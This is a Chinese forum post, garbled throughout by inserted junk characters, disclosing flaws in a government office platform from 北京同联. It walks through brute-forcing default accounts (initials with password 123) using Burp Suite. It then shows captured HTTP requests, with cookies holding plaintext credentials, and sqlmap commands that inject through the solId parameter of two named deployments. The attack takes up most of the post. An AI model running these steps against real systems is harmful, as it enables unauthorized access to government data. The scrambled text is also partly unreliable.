|
/ ^; s; F7 t- t% p- j! @; j
. [' i9 G. C; B
- Z& @8 F7 t" R( l% _/ k* u( N0 a
+ L: k% j- t1 M" I( i) n 平台简介:- D( q$ e: Y( a9 K7 l
0 C+ Q' I; y7 l3 \+ e: h7 j0 _ K. [3 l( j, W$ L$ f8 f
* ^0 m' r5 L: d4 G9 w$ e2 b0 Q0 M
2 z! j3 E/ r1 D1 z0 L
4 y) A) ~+ Z. A- W 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
- d9 L7 C( w6 v同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
4 S" c' r7 E# d4 W8 N' t同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 b Y- y& \+ ]/ p4 x
/ d/ c# P, j( H7 H R
$ A H A! R. g; y o
# x* V' N; ~( y5 I7 E 0 V0 q8 k/ ?! g" I3 f; n8 G
; d/ v q5 n. N Z4 T$ G 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 n/ N* v$ a$ w . g& ~( V5 x$ \7 l
0 l7 k; B! N% s2 ]+ y, v
" `% C( e8 G( T, l" [, h6 J
2 _9 U0 b) ^6 @ j8 ?8 K W1 }) a! p
http://1.1.1.1:7197/cap-aco/#(案例2-)
+ u; ?" H% R( G. b . v! I7 ]7 O h" Q5 D& u
8 h. ?% x& n* b3 H3 B5 o/ V http://www.XXOO.com (案例1-官网网站)' v4 h' _' P- m$ X$ B
+ x/ O. K: ?1 G6 Q, p |
6 o0 P' \- v: U' E
8 B# P$ w! J- E9 |% E% H* z: T 0 i1 d4 V0 D% F' f+ d% S" `
; { y2 n; ~( {/ a/ F9 I: n4 C; A 漏洞详情:
1 K: V4 Y P0 n" o7 r9 @
: E& n9 Z4 n) M; T/ ?
' j$ i' d2 p0 y7 I }# p) R 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
( ~7 [$ x% r9 a4 ^ * ^, \3 h9 ~% C
7 j6 E( p# X$ `2 s( h: \/ H 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) j# j3 P6 W( ]. z" n3 [2 [; V/ j7 c + o3 m3 I# {2 |8 o8 j7 d; Q
# _2 g' F3 v) u- w6 c
: V8 |3 @& X5 K
/ a9 t9 v( ]% C N( t6 A% S8 c( H5 l4 [7 E" ?! T6 w8 t9 F: e; w
$ x% l& d; J% j7 l 7 ~; j H! ~; `- E
3 R8 Y1 v9 d. ~0 Q: z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:; N2 S, t* r) i4 j7 {% _& V; e
" @9 u+ t( d2 a1 r& r, a8 ?8 m7 N5 W. ~4 E7 j3 U( n" f7 \
1、案例1-官方网站% A$ L2 E3 z7 l6 S5 G/ i+ q/ L
/ Z7 G: d: c- c% v
$ i7 G7 i1 t" U& t! F. w
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
* q' S; C; M9 ^- F/ g % O, a% j- }- J
3 m3 E% k$ Y. I7 ~
Host: www.XXOO.com5 P, i$ {- J" Z2 ^) p" w5 {
! a: b+ V, Z/ Y
% c) o1 P: @8 t& i/ b) j6 h
Proxy-Connection: Keep-Alive9 m% D4 ^3 f t O3 R& h, z' a
% E9 T, v4 ?. K1 a% O4 h3 a& ?: g* F
Accept: application/json, text/javascript, */*; q=0.019 z4 q! O- f" M; R
4 I3 B2 x3 d3 a9 b$ i
! |& i; |( _$ N1 n& M; [
Accept-Language: zh-CN
0 \5 V3 O% t D1 g7 g
$ F0 j2 R6 h; @: \& @: }6 [3 q5 V7 S0 p; ~$ L% S
Content-Type: application/json
9 I: o. P& d0 U$ J5 z( _
8 W* c5 g0 Y4 P1 Q5 q) |% X$ a; F; n3 W8 P' a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko0 d. d& d, T* m( q' L5 J
8 y" o) z: M5 s2 t( @8 ]+ N& m/ J) `" d/ y' T, g/ g3 x) B
X-Requested-With: XMLHttpRequest
) G" D( Y' I N p t3 ?
6 i- I$ H2 T$ C
& F% [- D% ~& j+ L+ [; W" f Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
" F& @" G9 _' }; S( M7 f9 ?4 I
. n5 c+ j1 Q8 W+ x3 s) X
8 O2 N! Y8 C/ H/ e! z2 f0 D) t Accept-Encoding: gzip, deflate, sdch
+ f+ G( Q l3 p2 l9 G( ?, L6 a6 o. K
- U; j) o, D; p' b1 r, R) S- M) R
3 Z5 c& m s3 {1 v Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. o; t- V& y) j* o3 ~4 `
3 h4 f) L# l- r3 C" `# E3 U: Y. o; Y
) \- c0 E( O) C 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
# C0 v* }- N6 R9 g % C; _$ N* s. j
# z$ ^. e" p/ o- a  : d- L2 O% v9 ]* G0 }- I8 j. O
0 H$ d* y* Q$ p" T p I
4 ?- J. U6 l5 w% [! g1 n( n- J 
- X2 E1 G8 i! P9 E, J: X) s: W , b( ^# e2 n _
3 i. K: c: k& w! n
# z* e* k" Y) r* a+ D0 Q6 }
" ^: r' B, n* ~0 I3 r: \; ]8 ?
5 P+ i3 \9 D& z D! X$ [8 | ' m6 l; `9 z* z9 t
" E. v* @, r3 V; X; c) D! ^( T2 z" V7 O
# w' S" c# X- S' X
) D! v) p) N) Y% M( _8 P* Z! \" k/ n; j( z$ n
2、案例2-某天河云平台
3 F) c% D) }, v; V3 D9 |0 R/ g
9 U: u, \6 D1 x# C( w4 D/ a6 ?
* l. N( n/ [# u) ]! i GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
W0 x0 J( a( f1 k 3 ^" y, K" L/ P; U8 K/ {
2 A' d2 K$ n$ I, F/ _- v
Host: 1.1.1.:7197
) \2 B8 |8 x6 Y* R: N& r: b; ]
2 v3 @. n: ]# w. t; c! { H6 I
/ L. G* v4 m& ~0 Q. k% |8 k6 y Accept: application/json, text/javascript, */*; q=0.013 ~1 i' B2 z( P& H5 } i
0 R- S) ?- B: P, k; _
; N0 A$ i: M/ f9 X, W X-Requested-With: XMLHttpRequest
( U* f! l& |; n6 Y9 x3 D
2 s+ m" j' V+ O3 E: L
9 @! o$ P J2 J8 Z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.04 V& n2 E2 r7 V
$ c; X( x. L+ M1 t! h* @0 K' j) ^0 [; c
Content-Type: application/json
5 c7 x: j% ^& k9 V6 ~" Q v5 a8 J
; m0 f% ]& ]. u/ f4 ]% c6 |1 O9 W \7 H w
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
7 S; ?7 m& [; h, D, E) ^+ w % @" E6 a3 d r# O3 E% j
A0 ]' @1 y4 c% L% D) R3 @ Accept-Language: zh-CN,zh;q=0.83 d6 G d* b( @
* l3 e3 G, N2 C8 L+ v7 q6 u* w" a9 v) m7 g' [8 S$ w
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 J2 |$ e' `4 O- h/ P7 I
$ g! J N/ d3 I9 F' `' i5 [
2 m" ^$ ~0 i$ y& A, ?& A( n
Connection: close
1 s4 n( Q* o; H& J/ v9 S! O6 }, }
1 U$ Z. z- O7 S- ? p
' [3 W6 ]* q) v3 a0 b. p 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
8 U# q8 e/ b: v! [8 R . {5 \. ]0 Z$ J1 \, u( d, S
7 j$ G* U3 c9 n  7 Z2 v: l' y m/ b
4 L( }" Y5 C3 m) F; j7 P5 h* }9 x' B0 X) K/ _( \, |
6 D3 n$ p6 O0 {3 Q8 x
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对